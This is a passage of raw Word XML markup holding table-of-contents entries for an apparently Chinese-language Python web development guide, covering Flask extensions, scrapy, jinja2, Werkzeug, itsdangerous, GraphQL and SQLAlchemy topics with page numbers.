              <w:t>报错勿用于生产环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780012 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>552</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20DB2871" w14:textId="3E2E047C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780013" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flask_sqlalchemy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780013 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>553</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12AB456E" w14:textId="32020DF2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780014" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flask-restplus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780014 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>553</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F934049" w14:textId="25F92F94" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780015" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>scrapy</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：网络爬虫框架</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780015 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>553</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F161A9E" w14:textId="56793361" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780016" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>jinja2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780016 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>553</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E080107" w14:textId="4B8DA8E7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780017" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>模板集成</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780017 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>554</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="441C5D62" w14:textId="25169875" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780018" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Werkzeug</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780018 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>555</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F374B8D" w14:textId="3A18CA3C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780019" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>itsdangerous</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：网络加密数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780019 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>555</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="575A169F" w14:textId="524E46A5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780020" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>graphql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780020 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>556</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3622A6A8" w14:textId="00F8B6D8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780021" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flask</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>搭建</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>graphql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780021 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>556</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A604D27" w14:textId="23C01DFF" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780022" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查询</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>schema</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780022 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>557</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B7CAE02" w14:textId="05394183" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780023" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Types</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780023 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>560</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="492C383A" w14:textId="76CBD577" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780024" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Graphene-SQLAlchemy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780024 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>560</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4075D712" w14:textId="1A353360" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780025" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ORM: sqlalchemy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780025 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>560</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03C8AAC1" w14:textId="41995995" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780026" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>概念</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780026 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>561</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="444B6017" w14:textId="43AC0FB4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780027" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>常见数据类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780027 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>561</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AB2321E" w14:textId="7E2311B0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780028" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建数据库表类（模型）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780028 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>562</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4139619F" w14:textId="40877C98" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780029" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>生成数据库表</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780029 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>562</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5162D77E" w14:textId="6C3BEBA8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780030" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>操作数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
